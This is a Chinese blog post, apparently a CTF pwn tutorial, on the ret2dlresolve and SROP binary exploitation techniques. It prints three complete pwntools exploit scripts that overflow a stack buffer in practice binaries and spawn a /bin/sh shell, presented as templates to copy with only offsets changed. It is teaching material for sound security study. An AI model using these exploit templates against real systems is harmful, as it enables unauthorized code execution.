ret2dlresolve,ret2srop

最新推荐文章于 2024-06-04 23:11:16 发布
最新推荐文章于 2024-06-04 23:11:16 发布
阅读量936 收藏 27
点赞数 14
文章标签: java linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79813730/article/details/136054255
版权

ret2dlresolve

在 Linux 中,程序使用 _dl_runtime_resolve(link_map_obj, reloc_offset) 来对动态链接的函数进行重定位。那么如果我们可以控制相应的参数及其对应地址的内容是不是就可以控制解析的函数了呢?答案是肯定的。这也是 ret2dlresolve 攻击的核心所在。

例题

ret2dlresolve平常不经常见,这里也简单简绍一下如何用工具来直接梭哈

  首先,32位的 标志特别突出,只有read函数能栈溢出

 exp:

from pwn import *
p=process("./pwn32")
elf = context.binary = ELF('./pwn32')
#p = remote("pwn.node.game.sycsec.com",11111)
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * (0x48+4))

rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)

log.info(rop.dump())

p.sendline(rop.chain())
p.sendline(dlresolve.payload)
p.interactive()

 不用去深究,会套脚本就可以,溢出字节以及文件名更换其他直接套

64位的也一样,只有read函数

 exp:

from pwn import *
p=process("./pwn64")
elf = context.binary = ELF('./pwn64')
#p = remote("pwn.node.game.sycsec.com",11111)
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * (0x30+8))
rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)

log.info(rop.dump())

p.sendline(rop.chain())
p.sendline(dlresolve.payload)
p.interactive()

 直接梭哈

ret2srop

signal 机制是类 unix 系统中进程之间相互传递信息的一种方法。一般,我们也称其为软中断信号,或者软中断。这个可以自行去了解

 主要是2,这个过程会rt_sigreturn函数进行还原,而且是根据栈中内容去还原,之后我们可以利用工具去伪造我们想要rop链

利用rt_sigreturn恢复ucontext_t的机制,我们可以构造一个假的ucontext_t,这样我们就能控制所有的寄存器。

对了结构体的构建,pwntools里面已经有现成的库函数:pwnlib.rop.srop — Sigreturn Oriented Programming — pwntools 4.11.1 documentation 。

frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = 0
frame.rdx = 0

 例题

没有一个函数,也不是我们经常利用的read,write函数,这里只有一次发送机会,但我们要发送两次,第一次先将返回地址再改成vuln函数,第二次发送我们的rop链

 当出syscall时也讲过寄存器的利用,要想调用system需要满足:

rax=0x3b(系统调用号)

rdi=/bin/sh

rsi=0x0

rdx=0x0

 调用sigreturn需满足

rax=0xf

ret=syscall

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn1")
elf=ELF("./pwn1")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def bug():
          gdb.attach(p)
          pause()
vuln=0x4004ED
syscall=0x400517
rax=0x4004DA
pay=b'a'*(0x10)+p64(vuln)
bug()
p.send(pay)
stack=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(stack))
frame=SigreturnFrame()
frame.rax=constants.SYS_execve

###系统调用号,可改为0x3b
frame.rdi=stack-328

##/bin/sh地址
frame.rsi=0
frame.rdx=0
#frame.rsp=stack-328
frame.rip=syscall
pay=b'/bin/sh\x00'*2+p64(rax)+p64(syscall)+bytes(frame)

#调用sigreturn并附带rop链
pause()
p.send(pay)
p.interactive()  

 打通本地

 

萧十三c
关注
  • 14
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SROP基本原理和利用
MillionSky的专栏
03-19 6855
1 概述SROP: Sigreturn Oriented Programming ,系统Signal Dispatch之前会将所有寄存器压入栈,然后调用signal handler,signal handler返回时会将栈的内容还原到寄存器。 如果事先填充栈,然后直接调用signal handler,那在返回的时候就可以控制寄存器的值。2 资源1. Framing Signals—A Return...
pwn07.ret2syscall例题
11-11
ret2syscall例题
Ret2dlresolve、Srop
weixin_66751120的博客
03-08 1358
介绍了ret2dlresolve和srop利用工具构造脚本进行解题的方法
ret2dlresolve利用方法
九层台
05-10 2316
使用场景: 一遍运行(延迟绑定技术,只有在第一次调用该函数时才会调用_dll_runtime_resolve函数) 没有输出,没有system函数。 需要: 1.向一个固定地址写入数据(bss段) 2.能够劫持程序执行流 linux下c函数是放在libc库里面的 ldd pwn01 linux-gate.so.1 => (0xf7ef2000) libc.s...
srop和ret2dlresolve
2302_79899078的博客
02-23 388
关于ret2dlresolve,建议去ctfwink具体了解原理,这里就直接上题了。找到syscall函数剩下的不用多说上代码。可以看到这里存在明显的栈溢出。
ret2dlresolve以及srop
2301_81031055的博客
02-22 535
linux在加载ELF可执行文件的时候,包含的动态链接文件里的符号,并不会直接把这些符号的实际地址加载到内存中,而是会使用PLT + GOT 表来实现延迟绑定,简单说就是在第一次用到动态链接文件里的符号的时候才会去寻找符号的实际位置然后保存下来,下次使用的时候就可以直接访问了。所以我们就会想到用srop去解题,首先需要伪造栈帧信息,通过执行sigreturn(也就是syscall系统调用),还原出我们伪造的栈帧信息,来达到控制寄存器的目的 ,上面的网站有详细的讲解呦!这里我们可以直接通过脚本去获取权限。
【WriteUp】栈溢出之ret2dl-reslove
qq_39933891的博客
03-08 398
CTFHUB技能树pwn栈溢出题目WriteUp
SROP 32位DEMO
MillionSky的专栏
03-19 518
1 概述开始学习SROP技巧。希望找到一个简单的demo来了解SROP。找了很多资料,但都没有实作成功。主要参考这篇文章1. Sigreturn Oriented Programming攻击简介https://www.anquanke.com/post/id/85810直接拿原文中的程序测试,没有复现成功,主要的问题有:1. VDSO的爆破不成功,GDB调试发现对应的位置没有找到对应的指令:sig...
SROP
Chuang__的博客
04-28 332
中级ROP之SROP
ret2libc exploit
07-07
exploit hack linux ret2libc
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
入门pwn题目ret2text
03-26
入门pwn题目ret2text
C语言头文件 RETCODE
06-13
C语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言...RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RET
JAVAEE之多线程进阶(2)_ CAS概念、实现原理、ABA问题及解决方案
2301_80653026的博客
05-29 1625
CAS全称Compare and swap,字面意思:”比较并交换“,它是一条 CPU 并发原语,用于判断内存中某个值是否为预期值,如果是则更改为新的值,这个过程是原子的。全称 Compare and swap, 即 “比较并交换”. 相当于通过一个原子的操作, 同时完成 “读取内存, 比较是否相等, 修改内存” 这三个步骤. 本质上需要 CPU 指令的支撑。
java环境部署
JiuMeilove的博客
06-04 389
如果你电脑已经下载了 jdk ,那你可以跳过这一步了我这里下载的是java21 你们可以选择自己需要下载的游览进去的页面是这样子的(相比以前这个页面发生很大变化了),可以看见目前 jdk 已经发行到 17 了,jdk 它又分了三个个操作系统,一个是 Linux、一个是 macOS、以及 windows,如果你是在 windows 操作系统上,那当然就下载 windows 对应的 jdk,其次的话就是还会区分你操作系统的处理器是 32 位的还是 64 位的,可以点击 我的电脑 - 属性 查看。
java中Overload和Override的区别
codedadi的博客
06-04 574
当调用Dog对象的makeSound方法时,将执行Dog类中的方法,而不是Animal类中的方法。定义:在子类中,有一个与父类同名、同参数列表、同返回类型(或协变返回类型)的方法,则称子类中的该方法为父类同名方法的重写。子类方法的访问权限不能低于父类方法的访问权限(如父类方法为public,则子类方法也必须是public)。Override(重写):子类与父类之间,方法名、参数列表和返回类型(或协变返回类型)相同。定义:在同一个类中,方法名相同但参数列表(参数类型、参数数量或参数顺序)不同的多个方法。
JavaScript第九讲:BOM编程
最新发布
星途码客的博客
06-04 1432
今天星途给大家带来JavaScript倒数第二部分知识:BOM编程,希望对码客们有帮助。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值